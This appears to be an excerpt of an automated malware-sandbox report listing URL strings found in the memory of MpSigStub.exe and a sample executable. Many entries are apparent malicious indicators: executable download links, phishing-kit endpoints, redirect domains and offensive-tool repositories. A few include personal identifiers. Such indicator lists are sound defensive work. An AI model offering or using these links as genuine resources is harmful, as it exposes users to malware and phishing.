Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://picsum.photos/80
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/empireproject/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://rcimshop.com/wp-config-server.php
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: https://rootca.allianz.com/aapplet
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://s15events.azure-automation.net/webhooks?token=
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://salebooks.xyz/app/app.exe
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://semalt.com/popups/popup_wow.php?lang=en
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://studio.joellemagazine.com/drms/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://sundersls.weebly.com
Source: 1gPmnCR2PX.exe String found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
Source: 1gPmnCR2PX.exe String found in binary or memory: https://support.google.com/chrome/?p=plugin_fla
Source: 1gPmnCR2PX.exe String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://upurl.me/m7oiv
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://vespang.cf/aggreey/post.php
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/ddy/next.php
